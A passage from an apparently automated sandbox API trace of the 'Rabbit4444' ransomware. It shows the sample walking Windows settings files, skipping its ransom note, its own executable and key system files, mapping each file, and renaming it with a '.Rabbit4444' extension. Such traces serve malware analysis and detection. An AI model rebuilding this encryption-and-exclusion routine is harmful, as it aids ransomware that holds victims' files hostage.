"c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5530e8cc-1b9e-4798-a880-ba719adfbbbd}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5530E8CC-1B9E-4798-A880-BA719ADFBBBD}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5530e8cc-1b9e-4798-a880-ba719adfbbbd}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.656] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a9696, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e6a9696, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224d97aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", cAlternateFileName="CL17D4~1.SET")) returned 1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2=".") returned 1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="..") returned 1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="windows") returned -1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="boot") returned 1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.656] lstrcmpiW (lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.656] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms" | out: lpString1="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms") returned="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms" [0058.657] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.657] lstrlenW (lpString="Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms") returned 64 [0058.657] lstrlenW (lpString="Rabbit4444") returned 10 [0058.657] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.657] lstrlenW (lpString=".dll") returned 4 [0058.657] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.657] lstrlenW (lpString=".lnk") returned 4 [0058.657] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.657] lstrlenW (lpString=".ini") returned 4 [0058.657] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.657] lstrlenW (lpString=".sys") returned 4 [0058.657] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.657] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.657] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.657] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14996815120) returned 1 [0058.657] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1092) returned 1 [0058.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0058.658] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0058.658] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x750, lpName=0x0) returned 0x298 [0058.659] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x70000 [0058.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0058.659] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.660] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.660] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.660] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.660] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0058.660] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14997064462) returned 1 [0058.660] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0058.660] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0058.660] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.660] CloseHandle (hObject=0x298) returned 1 [0058.660] CloseHandle (hObject=0x278) returned 1 [0058.660] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms.Rabbit4444") returned 192 [0058.660] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{58e3c745-d971-4081-9034-86e34b30836a}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.661] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e7da970, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e7da970, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", cAlternateFileName="CL97C2~1.SET")) returned 1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2=".") returned 1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="..") returned 1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="windows") returned -1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="boot") returned 1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.661] lstrcmpiW (lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.661] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms" | out: lpString1="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms") returned="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms" [0058.661] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.662] lstrlenW (lpString="Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms") returned 64 [0058.662] lstrlenW (lpString="Rabbit4444") returned 10 [0058.662] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.662] lstrlenW (lpString=".dll") returned 4 [0058.662] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.662] lstrlenW (lpString=".lnk") returned 4 [0058.662] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.662] lstrlenW (lpString=".ini") returned 4 [0058.662] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.662] lstrlenW (lpString=".sys") returned 4 [0058.662] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.662] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5902614c-d9c7-4902-9f7f-baf85454d0b2}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.662] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.662] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14997312396) returned 1 [0058.662] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=966) returned 1 [0058.662] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.663] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0058.663] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0058.664] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0058.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0058.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0058.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0058.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0058.665] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14997574112) returned 1 [0058.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.665] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0058.665] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.665] CloseHandle (hObject=0x298) returned 1 [0058.665] CloseHandle (hObject=0x278) returned 1 [0058.665] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms.Rabbit4444") returned 192 [0058.665] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5902614c-d9c7-4902-9f7f-baf85454d0b2}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5902614C-D9C7-4902-9F7F-BAF85454D0B2}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5902614c-d9c7-4902-9f7f-baf85454d0b2}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.666] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e899534, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e899534, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", cAlternateFileName="CL4596~1.SET")) returned 1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2=".") returned 1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="..") returned 1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="windows") returned -1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.666] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="boot") returned 1 [0058.667] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.667] lstrcmpiW (lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.667] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms" | out: lpString1="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms") returned="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms" [0058.667] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.667] lstrlenW (lpString="Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms") returned 64 [0058.667] lstrlenW (lpString="Rabbit4444") returned 10 [0058.667] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0058.667] lstrlenW (lpString=".dll") returned 4 [0058.667] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0058.667] lstrlenW (lpString=".lnk") returned 4 [0058.667] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0058.667] lstrlenW (lpString=".ini") returned 4 [0058.667] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0058.667] lstrlenW (lpString=".sys") returned 4 [0058.667] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0058.667] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5a2c0e5e-5974-4e44-b4c6-ad4c2b6baf53}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0058.667] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0058.667] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14997817002) returned 1 [0058.667] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0058.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0058.668] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0058.668] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0058.670] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0058.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0058.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0058.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0058.671] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0058.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0058.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0058.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0058.671] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14998209308) returned 1 [0058.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0058.671] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0058.671] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0058.672] CloseHandle (hObject=0x298) returned 1 [0058.672] CloseHandle (hObject=0x278) returned 1 [0058.672] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms.Rabbit4444") returned 192 [0058.672] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5a2c0e5e-5974-4e44-b4c6-ad4c2b6baf53}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5A2C0E5E-5974-4E44-B4C6-AD4C2B6BAF53}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{5a2c0e5e-5974-4e44-b4c6-ad4c2b6baf53}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0058.673] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e958117, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x4e958117, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231aa1ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", cAlternateFileName="CL3386~1.SET")) returned 1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2=".") returned 1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="..") returned 1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="windows") returned -1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="bootmgr") returned 1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="boot") returned 1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="ids.txt") returned -1 [0058.673] lstrcmpiW (lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0058.673] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms" | out: lpString1="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms") returned="Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms" [0058.673] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{5BB16858-F647-465E-BCFD-010EE9DD41B7}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0058.674] lstrlenW 